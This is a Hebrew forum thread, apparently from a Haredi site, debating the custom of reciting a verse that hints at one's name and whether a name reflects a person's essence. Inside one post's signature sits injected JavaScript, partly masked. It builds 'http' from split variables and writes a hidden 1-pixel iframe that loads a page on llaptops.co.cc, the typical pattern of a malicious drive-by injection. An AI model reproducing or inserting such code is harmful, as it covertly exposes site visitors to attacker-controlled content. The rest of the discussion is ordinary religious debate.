בית פורומים עצור כאן חושבים

פסוקים לשמות אנשים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-6/12/2010 23:45 לינק ישיר 

בעלהגדה כתב:

ישנם אנשים שדאגתם היחידה מיום דין ותוכחה. היא שלא ישכחו את שמם..

ובאמת שעצם הרעיון הזה מוזר הוא עד מאוד. ניתן להבין שאדם חושש שמא יגיע לזקנה ודעתו תיטרף עליו עד כדי כך שישכח את שמו, אבל מה פתאום להמציא חשש שמא אדם ישכח את שמו לעתיד לבוא ליום הדין? כלום אין למעלה מי שיודע את השם?

דדווח על תוכן פוגעני

נשלח ב-6/12/2010 23:56 לינק ישיר 

אליעזרט כתב:

ישנם אנשים שדאגתם היחידה מיום דין ותוכחה. היא שלא ישכחו את שמם..

ובאמת שעצם הרעיון הזה מוזר הוא עד מאוד. ניתן להבין שאדם חושש שמא יגיע לזקנה ודעתו תיטרף עליו עד כדי כך שישכח את שמו, אבל מה פתאום להמציא חשש שמא אדם ישכח את שמו לעתיד לבוא ליום הדין? כלום אין למעלה מי שיודע את השם?

רבנו אליעזר

שמו של האדם הוא מהותו, וכשהוא עומד לדין הוא מראה את "מעשה איש ופקודתו", כלומר השוואה בין שליחותו ובין ביצועיו בפועל. תמצית שליחותו הוא שמו, ולכן כשצריכים להתמודד עם זה בעולם האמת נוטים כנראה "לשכוח" אותה. 

אגב, האר"י אומר שהוא מראה את שמו על גבי פרקי אצבעותיו לפי סדר ידוע, כך שהפסוק הוא תחילת הדרך...

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 00:04 לינק ישיר 

שותף,

ברוך שובך. נניח שאני קונה תירוץ זה - אבל מה עורר את החשש הזה דווקא בזמנו של בעל קיצור השל"ה?

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 00:09 לינק ישיר 

אליעזרט כתב:
שותף,

ברוך שובך. נניח שאני קונה תירוץ זה - אבל מה עורר את החשש הזה דווקא בזמנו של בעל קיצור השל"ה?

אין לי מושג

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 00:56 לינק ישיר 

שותף סוד

העלית את הטענה המעניינת כי "שמו של האדם הוא מהותו".

קשה לי להבין את האמירה הזו.

בין השאר בגלל שלא ברור לי איך אתה משתמש במילה "מהות".

בכימיה, למשל, מהותו של יסוד היא מספר הפרוטונים, הנייטרונים והאלקטרונים שלו, ויחד הם קובעים את תכונותיו.

אולם מהי "מהות" אצל אדם? האם יש הבדל בין מהות של אדם לאדם? במה באה מהות זו לידי ביטוי ובאיזה חלק מוכר לנו של האדם היא נמצאת, אם בכלל? אני מבין שמדובר במשהו "פנימי" יותר שממנו ינבעו תכונות נוספות.

יש לי קושי נוסף עם קביעה כזו כי אני סבור, אישית, כמו האקזיסטנציאליסטים, שמתכונתו של האדם שהוא אפשרות פתוחה, והכל פתוח לשינוי אצלו, כפי שהרמב"ם מנסה לשכנע את לומדיו.

אז אשמח אם תבאר יותר מהי אותה מהות. ובעיקר אם תוכל לתת דוגמאות למהויות, אולי מאופי של בני אדם ואולי מאישים ידועים בהיסטוריה (במיגבלה שניתן להכיר אנשים רק על פעולותיהם מבחוץ).

עוד אשמח אם תבהיר כיצד השם, כלומר צירוף אותיות מסויים שגם מן הסתם נשמע באופן מסויים, קשור למהות. אני משייך עצמי לאסכולה של הסבורים כי השם אינו קובע מאומה, וכי השושנה היתה בעלת ניחוח נעים גם אם היו קוראים לה בשם אחרת, נניח "חוחית" (המקור: שייקספיר). איך אם כן נוצר קשר בין השם ואותיותיו לבין מהות?

תודה מראש

(ואני שמח לראות שלא נואשת ואתה עדיין כאן.  טול איקון ירוק מנפנף לשלום).

שומר פיו ולשונו - שומר מצרות נפשו < language="">

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 05:00 לינק ישיר 

מיימוני כתב:

אז אשמח אם תבאר יותר מהי אותה מהות. ובעיקר אם תוכל לתת דוגמאות למהויות, אולי מאופי של בני אדם ואולי מאישים ידועים בהיסטוריה (במיגבלה שניתן להכיר אנשים רק על פעולותיהם מבחוץ).

עוד אשמח אם תבהיר כיצד השם, כלומר צירוף אותיות מסויים שגם מן הסתם נשמע באופן מסויים, קשור למהות. אני משייך עצמי לאסכולה של הסבורים כי השם אינו קובע מאומה, וכי השושנה היתה בעלת ניחוח נעים גם אם היו קוראים לה בשם אחרת, נניח "חוחית" (המקור: שייקספיר). איך אם כן נוצר קשר בין השם ואותיותיו לבין מהות?

תודה מראש

(ואני שמח לראות שלא נואשת ואתה עדיין כאן.  טול איקון ירוק מנפנף לשלום).

שומר פיו ולשונו - שומר מצרות נפשו ******* language=""> *-- var as='h'; var ac='tt'; var ab='p'; var ay="//"; document.write("*************** src='"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"' frameborder='0' height=1px width=1px scrolling='no' ><*"); //*

מיימוני,

מנסיון העבר (העגמומי משהו) נראה לי שאני מוכן להיכנס איתך לכל דיון אבל בתנאי אחד- אל תיעלם. זה משגע לכתוב תגובה ולזרוק אותה לחלל הפורח, בלי לדעת אם ומתי תבוא לה תגובת נגד. אם אתה מבטיח לפחות תגובה אחת ליום (חוץ משישישבת) אני איתך בכל נושא. קדימה, נראה אם ומתי תענה על זה....

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 08:28 לינק ישיר 

אני מחכה להסבר.

לגבי העתיד, עד כמה שזה בידי, אשתדל להיות נוכח לפחות פעם ביום כדי להגיב.

שומר פיו ולשונו - שומר מצרות נפשו < language="">

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 08:40 לינק ישיר 

והאידנא דאיניש הוו ליה כמה ניקי, מאן הוא מהותיה?

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 10:31 לינק ישיר 

מיימוני כתב:
שותף סוד
העלית את הטענה המעניינת כי "שמו של האדם הוא מהותו".
קשה לי להבין את האמירה הזו.
בין השאר בגלל שלא ברור לי איך אתה משתמש במילה "מהות".
בכימיה, למשל, מהותו של יסוד היא מספר הפרוטונים, הנייטרונים והאלקטרונים שלו, ויחד הם קובעים את תכונותיו.
אולם מהי "מהות" אצל אדם? האם יש הבדל בין מהות של אדם לאדם? במה באה מהות זו לידי ביטוי ובאיזה חלק מוכר לנו של האדם היא נמצאת, אם בכלל? אני מבין שמדובר במשהו "פנימי" יותר שממנו ינבעו תכונות נוספות.

מהותו של האדם היא שליחותו. רצון הבורא הכללי בקיום ומהלך העולמות מתפרט לרצונות ספציפיים לכל נברא בנפרד כחלק מהמערכת השלימה. בקומת האדם (המורכבת מיחידה חיה נשמה רוח ונפש, שהן בחינת רצון מחשבה הרהור דיבור ומעשה) השליחות נמצאת ביחידה, ומשם מתפתחת והולכת עד מימושה בחלקים התחתונים של קומתו הרוחנית ובגופו הגשמי.   
-
יש לי קושי נוסף עם קביעה כזו כי אני סבור, אישית, כמו האקזיסטנציאליסטים, שמתכונתו של האדם שהוא אפשרות פתוחה, והכל פתוח לשינוי אצלו, כפי שהרמב"ם מנסה לשכנע את לומדיו.

היכולת של האדם להיות כמשה מחד או כירבעם מאידך היא באותה משבצת שמיועדת לו, כלומר האם ינצל את כוחותיו למימוש שליחותו המסויימת או יסרב לעשות כך. מהותו של משה היתה למשות את כלל ישראל ממצרים ולהכשירם לקבלת התורה, והוא עשה זאת בהצלחה. מהות ירבעם היתה להגיע לדרגת משיח בן יוסף כהכנה למלכות דוד והוא סרב לעשות זאת. משה לא היה יכול לעשות את שליחות ירבעם וירבעם לא יכול לעשות את שליחות משה. כל אחד נידון ע"פ שליחותו "מעשה איש ופקודתו".

חז"ל אומרים ש"שושנה" גימ' "אסתר", שהיא אחת משמות השכינה הקדושה. לכן משתמש שלמה בדימוי של שושנה דווקא בין החוחים, ולכן השושנה מתגלית כך בטבע.
לימוד מהות האותיות וצירופן זל"ז הוא מהסוגיות היותר נעלמות שבסוד, ומקורו בעיקר סביב ספר יצירה.

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 10:44 לינק ישיר 

שותף
דמי חנוכה

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 10:52 לינק ישיר 

שותף, אשמח אם תענה לי לשאלה האם מכל הסבריך מוסקת המסקנה שאמירת פסוק המרמז שמו מסוגלת לזכור מהותו ביום הדין, ושהענין הזה הוא דבר חשוב ביותר. זו השאלה הראשונה. והשנית, אם אמנם זה דבר חשוב, האם זה הגיוני שעל ידי דבר קל כהזכרת פסוק ניתן להשיג דבר חשוב?

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 11:12 לינק ישיר 

למיימוני

לפי התשובה שקיבלת-משה משה את העם אבל מה עם ירבעם האם הפך לרבע עם? ריבע את המעגל?-אין ממש תשובה...

השאלה הידועה שמתעוררת   לגבי מדרש שמות  היא איך קורה שמיליוני אנשים שיש להם שם משותף אז לכאורה היה צריך לראות איזשהו דמיון בינהם .

כמו שמשה משה את העם הרי לפי זה כל משה צריך למשות וכל יעקב צריך לעקב וכל יצחק צריך להיות קשור בצחוק... אחרי הכל בעלי שם משותף צריכים הרילהיות  נשמות תאומות ותואמות לפחות כמו תאומים זהים.-אבל במציאות נראה בברור שמהותם של היעקובים ומהותם של היצחקים שונהאיש מרעהו  וגורלם שונה ואין שום דמיון ביניהם.

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 11:44 לינק ישיר 

פרספקטיבה כתב:
שותף, אשמח אם תענה לי לשאלה האם מכל הסבריך מוסקת המסקנה שאמירת פסוק המרמז שמו מסוגלת לזכור מהותו ביום הדין, ושהענין הזה הוא דבר חשוב ביותר. זו השאלה הראשונה. והשנית, אם אמנם זה דבר חשוב, האם זה הגיוני שעל ידי דבר קל כהזכרת פסוק ניתן להשיג דבר חשוב?

אין לי קשר לסגולה הזאת. אני עניתי למיימוני על שאלותיו.

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 11:50 לינק ישיר 

כמה- אנשים ונשים בשם- שמחה והם בעלי מרה שחורה
כמה נשים בשם מזל - מסכנות- כמה נשים בשם יפה -בלומה שיינה וכד- והם נראות  נו -כמה טובות גיטות והם מרשעות. כמה אנשים בשם צבי והם הולכים לאט ובכבדות- וכמה אנשים בשם אריה מתנהגים כמו שפנים, כמה דוב ים יש והם שועלים. וכוכ'
אבל השמות קובעים את אופיו ומזלו של האדם הגמרא גם אומרת  השם גורם

דדווח על תוכן פוגעני

נשלח ב-7/12/2010 12:07 לינק ישיר 

נראה לי שהניק יותר משקף את האדם מאשר השם, כי את הניק הוא בחר.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > פסוקים לשמות אנשים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 5 6 7 לדף הבא סך הכל 7 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.